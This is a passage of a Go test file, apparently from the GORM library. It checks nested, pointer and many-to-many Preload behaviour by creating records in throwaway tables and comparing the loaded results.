if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{Level2: Level2{Level1: Level1{Value: "value"}}}
if err := DB.Create(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2").Preload("Level2.Level1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
if err := DB.Preload("Level2").Preload("Level2.Level1").Find(&got, "name = ?", "not_found").Error; err != gorm.ErrRecordNotFound {
t.Error(err)
}
}
func TestNestedPreload2(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1s []*Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2s []Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Level2s: []Level2{
{
Level1s: []*Level1{
{Value: "value1"},
{Value: "value2"},
},
},
{
Level1s: []*Level1{
{Value: "value3"},
},
},
},
}
if err := DB.Create(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2s.Level1s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload3(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1 Level1
Level3ID uint
}
Level3 struct {
Name string
ID uint
Level2s []Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Level2s: []Level2{
{Level1: Level1{Value: "value1"}},
{Level1: Level1{Value: "value2"}},
},
}
if err := DB.Create(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2s.Level1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload4(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1s []Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2 Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Level2: Level2{
Level1s: []Level1{
{Value: "value1"},
{Value: "value2"},
},
},
}
if err := DB.Create(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2.Level1s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
// Slice: []Level3
func TestNestedPreload5(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1 Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2 Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := make([]Level3, 2)
want[0] = Level3{Level2: Level2{Level1: Level1{Value: "value"}}}
if err := DB.Create(&want[0]).Error; err != nil {
t.Error(err)
}
want[1] = Level3{Level2: Level2{Level1: Level1{Value: "value2"}}}
if err := DB.Create(&want[1]).Error; err != nil {
t.Error(err)
}
var got []Level3
if err := DB.Preload("Level2").Preload("Level2.Level1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload6(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1s []Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2s []Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := make([]Level3, 2)
want[0] = Level3{
Level2s: []Level2{
{
Level1s: []Level1{
{Value: "value1"},
{Value: "value2"},
},
},
{
Level1s: []Level1{
{Value: "value3"},
},
},
},
}
if err := DB.Create(&want[0]).Error; err != nil {
t.Error(err)
}
want[1] = Level3{
Level2s: []Level2{
{
Level1s: []Level1{
{Value: "value3"},
{Value: "value4"},
},
},
{
Level1s: []Level1{
{Value: "value5"},
},
},
},
}
if err := DB.Create(&want[1]).Error; err != nil {
t.Error(err)
}
var got []Level3
if err := DB.Preload("Level2s.Level1s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload7(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1 Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2s []Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := make([]Level3, 2)
want[0] = Level3{
Level2s: []Level2{
{Level1: Level1{Value: "value1"}},
{Level1: Level1{Value: "value2"}},
},
}
if err := DB.Create(&want[0]).Error; err != nil {
t.Error(err)
}
want[1] = Level3{
Level2s: []Level2{
{Level1: Level1{Value: "value3"}},
{Level1: Level1{Value: "value4"}},
},
}
if err := DB.Create(&want[1]).Error; err != nil {
t.Error(err)
}
var got []Level3
if err := DB.Preload("Level2s.Level1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload8(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1s []Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2 Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := make([]Level3, 2)
want[0] = Level3{
Level2: Level2{
Level1s: []Level1{
{Value: "value1"},
{Value: "value2"},
},
},
}
if err := DB.Create(&want[0]).Error; err != nil {
t.Error(err)
}
want[1] = Level3{
Level2: Level2{
Level1s: []Level1{
{Value: "value3"},
{Value: "value4"},
},
},
}
if err := DB.Create(&want[1]).Error; err != nil {
t.Error(err)
}
var got []Level3
if err := DB.Preload("Level2.Level1s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload9(t *testing.T) {
type (
Level0 struct {
ID uint
Value string
Level1ID uint
}
Level1 struct {
ID uint
Value string
Level2ID uint
Level2_1ID uint
Level0s []Level0
}
Level2 struct {
ID uint
Level1s []Level1
Level3ID uint
}
Level2_1 struct {
ID uint
Level1s []Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2 Level2
Level2_1 Level2_1
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level2_1{})
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level0{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}, &Level2_1{}, &Level0{}).Error; err != nil {
t.Error(err)
}
want := make([]Level3, 2)
want[0] = Level3{
Level2: Level2{
Level1s: []Level1{
{Value: "value1"},
{Value: "value2"},
},
},
Level2_1: Level2_1{
Level1s: []Level1{
{
Value: "value1-1",
Level0s: []Level0{{Value: "Level0-1"}},
},
{
Value: "value2-2",
Level0s: []Level0{{Value: "Level0-2"}},
},
},
},
}
if err := DB.Create(&want[0]).Error; err != nil {
t.Error(err)
}
want[1] = Level3{
Level2: Level2{
Level1s: []Level1{
{Value: "value3"},
{Value: "value4"},
},
},
Level2_1: Level2_1{
Level1s: []Level1{
{
Value: "value3-3",
Level0s: []Level0{},
},
{
Value: "value4-4",
Level0s: []Level0{},
},
},
},
}
if err := DB.Create(&want[1]).Error; err != nil {
t.Error(err)
}
var got []Level3
if err := DB.Preload("Level2").Preload("Level2.Level1s").Preload("Level2_1").Preload("Level2_1.Level1s").Preload("Level2_1.Level1s.Level0s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
type LevelA1 struct {
ID uint
Value string
}
type LevelA2 struct {
ID uint
Value string
LevelA3s []*LevelA3
}
type LevelA3 struct {
ID uint
Value string
LevelA1ID sql.NullInt64
LevelA1 *LevelA1
LevelA2ID sql.NullInt64
LevelA2 *LevelA2
}
func TestNestedPreload10(t *testing.T) {
DB.DropTableIfExists(&LevelA3{})
DB.DropTableIfExists(&LevelA2{})
DB.DropTableIfExists(&LevelA1{})
if err := DB.AutoMigrate(&LevelA1{}, &LevelA2{}, &LevelA3{}).Error; err != nil {
t.Error(err)
}
levelA1 := &LevelA1{Value: "foo"}
if err := DB.Save(levelA1).Error; err != nil {
t.Error(err)
}
want := []*LevelA2{
{
Value: "bar",
LevelA3s: []*LevelA3{
{
Value: "qux",
LevelA1: levelA1,
},
},
},
{
Value: "bar 2",
LevelA3s: []*LevelA3{},
},
}
for _, levelA2 := range want {
if err := DB.Save(levelA2).Error; err != nil {
t.Error(err)
}
}
var got []*LevelA2
if err := DB.Preload("LevelA3s.LevelA1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
type LevelB1 struct {
ID uint
Value string
LevelB3s []*LevelB3
}
type LevelB2 struct {
ID uint
Value string
}
type LevelB3 struct {
ID uint
Value string
LevelB1ID sql.NullInt64
LevelB1 *LevelB1
LevelB2s []*LevelB2 `gorm:"many2many:levelb1_levelb3_levelb2s"`
}
func TestNestedPreload11(t *testing.T) {
DB.DropTableIfExists(&LevelB2{})
DB.DropTableIfExists(&LevelB3{})
DB.DropTableIfExists(&LevelB1{})
if err := DB.AutoMigrate(&LevelB1{}, &LevelB2{}, &LevelB3{}).Error; err != nil {
t.Error(err)
}
levelB1 := &LevelB1{Value: "foo"}
if err := DB.Create(levelB1).Error; err != nil {
t.Error(err)
}
levelB3 := &LevelB3{
Value: "bar",
LevelB1ID: sql.NullInt64{Valid: true, Int64: int64(levelB1.ID)},
}
if err := DB.Create(levelB3).Error; err != nil {
t.Error(err)
}
levelB1.LevelB3s = []*LevelB3{levelB3}
want := []*LevelB1{levelB1}
var got []*LevelB1
if err := DB.Preload("LevelB3s.LevelB2s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
type LevelC1 struct {
ID uint
Value string
LevelC2ID uint
}
type LevelC2 struct {
ID uint
Value string
LevelC1 LevelC1
}
type LevelC3 struct {
ID uint
Value string
LevelC2ID uint
LevelC2 LevelC2
}
func TestNestedPreload12(t *testing.T) {
DB.DropTableIfExists(&LevelC2{})
DB.DropTableIfExists(&LevelC3{})
DB.DropTableIfExists(&LevelC1{})
if err := DB.AutoMigrate(&LevelC1{}, &LevelC2{}, &LevelC3{}).Error; err != nil {
t.Error(err)
}
level2 := LevelC2{
Value: "c2",
LevelC1: LevelC1{
Value: "c1",
},
}
DB.Create(&level2)
want := []LevelC3{
{
Value: "c3-1",
LevelC2: level2,
}, {
Value: "c3-2",
LevelC2: level2,
},
}
for i := range want {
if err := DB.Create(&want[i]).Error; err != nil {
t.Error(err)
}
}
var got []LevelC3
if err := DB.Preload("LevelC2").Preload("LevelC2.LevelC1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestManyToManyPreloadWithMultiPrimaryKeys(t *testing.T) {
if dialect := os.Getenv("GORM_DIALECT"); dialect == "" || dialect == "sqlite" || dialect == "mssql" {
return
}
type (
Level1 struct {
ID uint `gorm:"primary_key;"`
LanguageCode string `gorm:"primary_key"`
Value string
}
Level2 struct {
ID uint `gorm:"primary_key;"`
LanguageCode string `gorm:"primary_key"`
Value string
Level1s []Level1 `gorm:"many2many:levels;"`
}
)
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists("levels")
if err := DB.AutoMigrate(&Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level2{Value: "Bob", LanguageCode: "ru", Level1s: []Level1{
{Value: "ru", LanguageCode: "ru"},
{Value: "en", LanguageCode: "en"},
}}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
want2 := Level2{Value: "Tom", LanguageCode: "zh", Level1s: []Level1{
{Value: "zh", LanguageCode: "zh"},
{Value: "de", LanguageCode: "de"},
}}
if err := DB.Save(&want2).Error; err != nil {
t.Error(err)
}
var got Level2
if err := DB.Preload("Level1s").Find(&got, "value = ?", "Bob").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
var got2 Level2
if err := DB.Preload("Level1s").Find(&got2, "value = ?", "Tom").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got2, want2) {
t.Errorf("got %s; want %s", toJSONString(got2), toJSONString(want2))
}
var got3 []Level2
if err := DB.Preload("Level1s").Find(&got3, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got3, []Level2{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got3), toJSONString([]Level2{got, got2}))
}
var got4 []Level2
if err := DB.Preload("Level1s", "value IN (?)", []string{"zh", "ru"}).Find(&got4, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
var ruLevel1 Level1
var zhLevel1 Level1
DB.First(&ruLevel1, "value = ?", "ru")
DB.First(&zhLevel1, "value = ?", "zh")
got.Level1s = []Level1{ruLevel1}
got2.Level1s = []Level1{zhLevel1}
if !reflect.DeepEqual(got4, []Level2{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got4), toJSONString([]Level2{got, got2}))
}
if err := DB.Preload("Level1s").Find(&got4, "value IN (?)", []string{"non-existing"}).Error; err != nil {
t.Error(err)
}
}
func TestManyToManyPreloadForNestedPointer(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []*Level1 `gorm:"many2many:levels;"`
}
Level3 struct {
ID uint
Value string
Level2ID sql.NullInt64
Level2 *Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists("levels")
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Value: "Bob",
Level2: &Level2{
Value: "Foo",
Level1s: []*Level1{
{Value: "ru"},
{Value: "en"},
},
},
}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
want2 := Level3{
Value: "Tom",
Level2: &Level2{
Value: "Bar",
Level1s: []*Level1{
{Value: "zh"},
{Value: "de"},
},
},
}
if err := DB.Save(&want2).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2.Level1s").Find(&got, "value = ?", "Bob").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
var got2 Level3
if err := DB.Preload("Level2.Level1s").Find(&got2, "value = ?", "Tom").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got2, want2) {
t.Errorf("got %s; want %s", toJSONString(got2), toJSONString(want2))
}
var got3 []Level3
if err := DB.Preload("Level2.Level1s").Find(&got3, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got3, []Level3{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got3), toJSONString([]Level3{got, got2}))
}
var got4 []Level3
if err := DB.Preload("Level2.Level1s", "value IN (?)", []string{"zh", "ru"}).Find(&got4, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
var got5 Level3
DB.Preload("Level2.Level1s").Find(&got5, "value = ?", "bogus")
var ruLevel1 Level1
var zhLevel1 Level1
DB.First(&ruLevel1, "value = ?", "ru")
DB.First(&zhLevel1, "value = ?", "zh")
got.Level2.Level1s = []*Level1{&ruLevel1}
got2.Level2.Level1s = []*Level1{&zhLevel1}
if !reflect.DeepEqual(got4, []Level3{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got4), toJSONString([]Level3{got, got2}))
}
}
func TestNestedManyToManyPreload(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []*Level1 `gorm:"many2many:level1_level2;"`
}
Level3 struct {
ID uint
Value string
Level2s []Level2 `gorm:"many2many:level2_level3;"`
}
)
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists("level1_level2")
DB.DropTableIfExists("level2_level3")
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Value: "Level3",
Level2s: []Level2{
{
Value: "Bob",
Level1s: []*Level1{
{Value: "ru"},
{Value: "en"},
},
}, {
Value: "Tom",
Level1s: []*Level1{
{Value: "zh"},
{Value: "de"},
},
},
},
}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2s").Preload("Level2s.Level1s").Find(&got, "value = ?", "Level3").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
if err := DB.Preload("Level2s.Level1s").Find(&got, "value = ?", "not_found").Error; err != gorm.ErrRecordNotFound {
t.Error(err)
}
}
func TestNestedManyToManyPreload2(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []*Level1 `gorm:"many2many:level1_level2;"`
}
Level3 struct {
ID uint
Value string
Level2ID sql.NullInt64
Level2 *Level2
}
)
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists("level1_level2")
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Value: "Level3",
Level2: &Level2{
Value: "Bob",
Level1s: []*Level1{
{Value: "ru"},
{Value: "en"},
},
},
}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2.Level1s").Find(&got, "value = ?", "Level3").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
if err := DB.Preload("Level2.Level1s").Find(&got, "value = ?", "not_found").Error; err != gorm.ErrRecordNotFound {
t.Error(err)
}
}
func TestNestedManyToManyPreload3(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []*Level1 `gorm:"many2many:level1_level2;"`
}
Level3 struct {
ID uint
Value string
Level2ID sql.NullInt64
Level2 *Level2
}
)
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists("level1_level2")
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
level1Zh := &Level1{Value: "zh"}
level1Ru := &Level1{Value: "ru"}
level1En := &Level1{Value: "en"}
level21 := &Level2{
Value: "Level2-1",
Level1s: []*Level1{level1Zh, level1Ru},
}
level22 := &Level2{
Value: "Level2-2",
Level1s: []*Level1{level1Zh, level1En},
}
wants := []*Level3{
{
Value: "Level3-1",
Level2: level21,
},
{
Value: "Level3-2",
Level2: level22,
},
{
Value: "Level3-3",
Level2: level21,
},
}
for _, want := range wants {
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
}
var gots []*Level3
if err := DB.Preload("Level2.Level1s", func(db *gorm.DB) *gorm.DB {
return db.Order("level1.id ASC")
}).Find(&gots).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(gots, wants) {
t.Errorf("got %s; want %s", toJSONString(gots), toJSONString(wants))
}
}
func TestNestedManyToManyPreload3ForStruct(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []Level1 `gorm:"many2many:level1_level2;"`
}
Level3 struct {
ID uint
Value string
Level2ID sql.NullInt64
Level2 Level2
}
)
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists("level1_level2")
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
level1Zh := Level1{Value: "zh"}
level1Ru := Level1{Value: "ru"}
level1En := Level1{Value: "en"}
level21 := Level2{
Value: "Level2-1",
Level1s: []Level1{level1Zh, level1Ru},
}
level22 := Level2{
Value: "Level2-2",
Level1s: []Level1{level1Zh, level1En},
}
wants := []*Level3{
{
Value: "Level3-1",
Level2: level21,
},
{
Value: "Level3-2",
Level2: level22,
},
{
Value: "Level3-3",
Level2: level21,
},
}
for _, want := range wants {
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
}
var gots []*Level3
if err := DB.Preload("Level2.Level1s", func(db *gorm.DB) *gorm.DB {
return db.Order("level1.id ASC")
}).Find(&gots).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(gots, wants) {
t.Errorf("got %s; want %s", toJSONString(gots), toJSONString(wants))
}
}
func TestNestedManyToManyPreload4(t *testing.T) {
type (
Level4 struct {
ID uint
Value string
Level3ID uint
}
Level3 struct {
ID uint
Value string
Level4s []*Level4
}
Level2 struct {
ID uint
Value string
Level3s []*Level3 `gorm:"many2many:level2_level3;"`
}
Level1 struct {
ID uint
Value string
Level2s []*Level2 `gorm:"many2many:level1_level2;"`
}
)
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level4{})
DB.DropTableIfExists("level1_level2")
DB.DropTableIfExists("level2_level3")
dummy := Level1{
Value: "Level1",
Level2s: []*Level2{{
Value: "Level2",
Level3s: []*Level3{{
Value: "Level3",
Level4s: []*Level4{{
Value: "Level4",
}},
}},
}},
}
if err := DB.AutoMigrate(&Level4{}, &Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
if err := DB.Save(&dummy).Error; err != nil {
t.Error(err)
}
var level1 Level1
if err := DB.Preload("Level2s").Preload("Level2s.Level3s").Preload("Level2s.Level3s.Level4s").First(&level1).Error; err != nil {
t.Error(err)
}
}
func TestManyToManyPreloadForPointer(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []*Level1 `gorm:"many2many:levels;"`
}
)
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists("levels")
if err := DB.AutoMigrate(&Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level2{Value: "Bob", Level1s: []*Level1{
{Value: "ru"},
{Value: "en"},
}}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
want2 := Level2{Value: "Tom", Level1s: []*Level1{
{Value: "zh"},
{Value: "de"},
}}
if err := DB.Save(&want2).Error; err != nil {
t.Error(err)
}
var got Level2
if err := DB.Preload("Level1s").Find(&got, "value = ?", "Bob").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
var got2 Level2
if err := DB.Preload("Level1s").Find(&got2, "value = ?", "Tom").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got2, want2) {
t.Errorf("got %s; want %s", toJSONString(got2), toJSONString(want2))
}
var got3 []Level2
if err := DB.Preload("Level1s").Find(&got3, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got3, []Level2{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got3), toJSONString([]Level2{got, got2}))
}
var got4 []Level2
if err := DB.Preload("Level1s", "value IN (?)", []string{"zh", "ru"}).Find(&got4, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
var got5 Level2
DB.Preload("Level1s").First(&got5, "value = ?", "bogus")
var ruLevel1 Level1
var zhLevel1 Level1
DB.First(&ruLevel1, "value = ?", "ru")
DB.First(&zhLevel1, "value = ?", "zh")
got.Level1s = []*Level1{&ruLevel1}
got2.Level1s = []*Level1{&zhLevel1}
if !reflect.DeepEqual(got4, []Level2{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got4), toJSONString([]Level2{got, got2}))
}
}
func TestNilPointerSlice(t *testing.T) {
type (
Level3 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level3ID uint
Level3 *Level3
}
Level1 struct {
ID uint
Value string
Level2ID uint
Level2 *Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level1{
Value: "Bob",
Level2: &Level2{
Value: "en",
Level3: &Level3{
Value: "native",
},
},
}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
want2 := Level1{
Value: "Tom",
Level2: nil,
}
if err := DB.Save(&want2).Error; err != nil {
t.Error(err)
}
var got []Level1
if err := DB.Preload("Level2").Preload("Level2.Level3").Find(&got).Error; err != nil {
t.Error(err)
}
if len(got) != 2 {
t.Errorf("got %v items, expected 2", len(got))
}
if !reflect.DeepEqual(got[0], want) && !reflect.DeepEqual(got[1], want) {
t.Errorf("got %s; want array containing %s", toJSONString(got), toJSONString(want))
}
if !reflect.DeepEqual(got[0], want2) && !reflect.DeepEqual(got[1], want2) {
t.Errorf("got %s; want array containing %s", toJSONString(got), toJSONString(want2))
}
}
func TestNilPointerSlice2(t *testing.T) {
type (
Level4 struct {
ID uint
}
Level3 struct {
ID uint
Level4ID sql.NullInt64 `sql:"index"`
Level4 *Level4
}
Level2 struct {
ID uint
Level3s []*Level3 `gorm:"many2many:level2_level3s"`
}
Level1 struct {
ID uint
Level2ID sql.NullInt64 `sql:"index"`
Level2 *Level2
}
)
DB.DropTableIfExists(new(Level4))
DB.DropTableIfExists(new(Level3))
DB.DropTableIfExists(new(Level2))
DB.DropTableIfExists(new(Level1))
if err := DB.AutoMigrate(new(Level4), new(Level3), new(Level2), new(Level1)).Error; err != nil {
t.Error(err)
}
want := new(Level1)
if err := DB.Save(want).Error; err != nil {
t.Error(err)
}
got := new(Level1)
err := DB.Preload("Level2.Level3s.Level4").Last(&got).Error
if err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestPrefixedPreloadDuplication(t *testing.T) {
type (
Level4 struct {
ID uint
Name string
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level4s []*Level4
}
Level2 struct {
ID uint
Name string
Level3ID sql.NullInt64 `sql:"index"`
Level3 *Level3
}
Level1 struct {
ID uint
Name string
Level2ID sql.NullInt64 `sql:"index"`
Level2 *Level2
}
)
DB.DropTableIfExists(new(Level3))
DB.DropTableIfExists(new(Level4))
DB.DropTableIfExists(new(Level2))
DB.DropTableIfExists(new(Level1))
if err := DB.AutoMigrate(new(Level3), new(Level4), new(Level2), new(Level1)).Error; err != nil {
t.Error(err)
}
lvl := &Level3{}
if err := DB.Save(lvl).Error; err != nil {
t.Error(err)
}
sublvl1 := &Level4{Level3ID: lvl.ID}
if err := DB.Save(sublvl1).Error; err != nil {
t.Error(err)
}
sublvl2 := &Level4{Level3ID: lvl.ID}
if err := DB.Save(sublvl2).Error; err != nil {
t.Error(err)
}
lvl.Level4s = []*Level4{sublvl1, sublvl2}
want1 := Level1{
Level2: &Level2{
Level3: lvl,
},
}
if err := DB.Save(&want1).Error; err != nil {
t.Error(err)
}
want2 := Level1{
Level2: &Level2{
Level3: lvl,
},
}
if err := DB.Save(&want2).Error; err != nil {
t.Error(err)
}
want := []Level1{want1, want2}
var got []Level1
err := DB.Preload("Level2.Level3.Level4s").Find(&got).Error
if err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestPreloadManyToManyCallbacks(t *testing.T) {
type (
Level2 struct {
ID uint
Name string
}
Level1 struct {
ID uint
Name string
Level2s []Level2 `gorm:"many2many:level1_level2s;AssociationForeignKey:ID;ForeignKey:ID"`
}
)
